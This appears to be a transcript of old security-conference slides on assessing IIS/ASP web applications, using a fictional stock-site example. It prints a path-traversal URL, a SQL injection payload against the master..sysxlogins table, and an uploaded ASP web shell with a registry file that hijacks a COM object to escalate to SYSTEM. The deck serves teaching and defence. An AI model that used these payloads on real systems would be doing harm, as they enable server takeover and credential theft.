Application Assessments on IIS
description
Transcript of Application Assessments on IIS
![Page 1: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/1.jpg)
Application Assessments on IISApplication Assessments on IIS
![Page 3: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/3.jpg)
What is an Application Assessment?
Part of a network vulnerability assessment
Application provides the site functionality
Application is least tested but often proves to be the
greatest risk
![Page 4: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/4.jpg)
Vulnerability Scanners
• Cybercop
• I. S. S.
• Cerberus Internet Scanner
![Page 5: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/5.jpg)
What scanners do do
They highlight known vulnerabilities in COTS products
Webhits.dll and null.htw
MSADC and RDS
Ism.dll and .htr overflow
%C0%AF UNICODE issue
![Page 6: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/6.jpg)
What scanners don’t do
They won’t assess your application
![Page 7: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/7.jpg)
![Page 8: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/8.jpg)
Assessing the Application
What services does the site offer?
What functionality exists to provide these services?
What drives this functionality?
How does it do this?
![Page 9: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/9.jpg)
Stocks-r-us.com
• Free charting service of current/real-time market trends
• A subscriber service providing detailed market analysis
• An “I’ve forgot my password” service
• A contact service
• Apply for a job with stocks-r-us.com online service
![Page 10: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/10.jpg)
Free charting service of current/real-time market trends
• From a web form a user chooses the stock market
• They also choose a time range
• On Submitting a page called read_img.asp returns a graph
of the ups and downs of the market:
http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png
http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=
![Page 11: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/11.jpg)
Exception Handling
ASP Error 800814:
Create object failed in /includes/olectra.inc
Downloading the .inc file reveals nothing but there are
two issues here: bad exception handling and .inc has
not been mapped to asp.dll
A search on google reveals Olectra Chart
![Page 12: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/12.jpg)
Source code revelation!
Olectra creates a virtual directory called /octemp
When a graph or chart is produced a temp directory is created in the /octemp directory. This directory’s name is a number like “00000008”
The dynamically produced graph is a random string of letters such as “AXYZPQ” and has a file extension of .png
/read_img.asp?IDN=../&IFN=read_img&IFE=asp
![Page 13: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/13.jpg)
SQL Queries
strSQL = “select price from stocks where name = ‘”
_ & request.querystring(“company”) & “’”
This code is insecure!!!
Why?
![Page 14: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/14.jpg)
By setting the “company” parameter to something such as:
ISSX’ select * from master..sysxlogins
Would execute the two queries in batch mode:
Select price from stocks where name= ‘ISSX’Select * from master..sysxlogins
‘sa’ login on MS SQL Server
xp_cmdshell extended stored procedure
![Page 15: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/15.jpg)
On its own, ASP will not escape a single ‘ (quote mark)
.idc files will.
Change all ‘s provided in a parameter to 0x27 or strip them out
![Page 16: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/16.jpg)
Consideration for integer input
strSQL = “Select company from stocks where price > “ & request.querystring(“price”)
Again we can insert an arbitrary SQL query here and have it execute.
![Page 17: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/17.jpg)
IsNumeric() for VBScript
NaN() fro JScript
Verifying numeric input
![Page 18: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/18.jpg)
r.f.p – Rain Forest Puppy
http://www.wiretrip.net/rfp
![Page 19: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/19.jpg)
Contact Service
<%
..
SMTPObj = GetObject(
“IIS://” & request.servervariables(“SERVER_NAME”) & “/SMTPSVC”)
..
%>
![Page 20: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/20.jpg)
HTTP SERVER_NAME Poisoning
“Host:” HTTP Client Header field
• Learn the password hash for the IWAM account
• Enumerate SQL servers
• Proxy attacks
• Samples on IIS
• ADSI, Corba and COM
![Page 21: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/21.jpg)
On-line job application service
As part of this service stocks-r-us.com allow uploading of Curriculum Vitaes / Resumes
Client Side checking doesn’t work
Scripting enabled on the /cvtemp virtual directory
![Page 22: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/22.jpg)
Gaining SYSTEM Privileges using ASP
• IIS Security Model
• IUSR and IWAM accounts
![Page 23: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/23.jpg)
Wscript.Shell Object
WSObj = CreateObject(“wscript.shell”)
• Read from the Registry
• Write to the Regsitry
• Execute commands
![Page 24: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/24.jpg)
<%
Dim WshShell, strCMD, result
strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"
strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"
Set WshShell = Server.CreateObject("Wscript.Shell")
On Error Resume Next
result = WshShell.Run(strCMD)
result = WshShell.Run(strCMD2)
%>
MSI.ASP
![Page 25: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/25.jpg)
REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32]
@="c:\\inetpub\\wwwroot\\foo.dll"
"ThreadingModel"="Both"
MSI.REG
![Page 26: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/26.jpg)
Summary
• Understand the technology you’re dealing with
• Never trust user input – anywhere
• Ensure permissions are set properly
• Don’t trust third-party software until truly evaluated
• Don’t rely on client side checking
• Scanners won’t find these problems – you will
![Page 27: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/27.jpg)
Questions?
![Page 28: Application Assessments on IIS](https://reader035.fdocuments.net/reader035/viewer/2022062723/56813fd9550346895daabe6a/html5/thumbnails/28.jpg)
Thanks and enjoy the rest the day!